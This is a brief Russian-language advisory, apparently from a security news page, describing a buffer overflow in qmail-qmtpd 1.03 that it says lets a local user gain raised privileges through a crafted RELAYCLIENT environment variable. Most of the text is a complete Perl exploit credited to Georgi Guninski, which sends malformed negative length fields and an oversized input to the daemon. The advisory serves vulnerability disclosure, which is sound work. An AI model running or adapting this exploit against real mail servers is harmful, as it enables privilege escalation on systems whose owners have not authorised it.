Программа: Qmail-qmtpd 1.03 

Переполнение буфера обнаружено в qmail-qmtpd. Локальный пользователь может получить поднятые привилегии.
Локальный пользователь может установить RELAYCLIENT переменную окружения к специально сформированному значению, чтобы вызвать переполнение буфера. 

Эксплоит: 

#!/usr/bin/perl -w

#Copyright Georgi Guninski\nCannot be used in vulnerability databases and
#similar stuff

use IO::Socket;
use IO::Poll;

$ENV{"RELAYCLIENT"}="M\$UX";
open(SOCK,"|/var/qmail/bin/qmail-qmtpd");

my $req;
my $fromaddr="they\@m\$.weenies";
my $touser="postmaster";

print "qmail-qmtpd buffer overflow. Copyright Georgi Guninski\nCannot be
used in vulnerability d
atabases and similar stuff\n";

$req = "1:\n,";
$req .= "1:V,";
$req .= "/:"; #biglen - this is how we code '-1'
$req .= ",:"; #len - this is how we code '-4'

print SOCK $req;
my $ch=getc();

$req = "v" x 100000;

print SOCK $req;
close SOCK;

Оставить мнение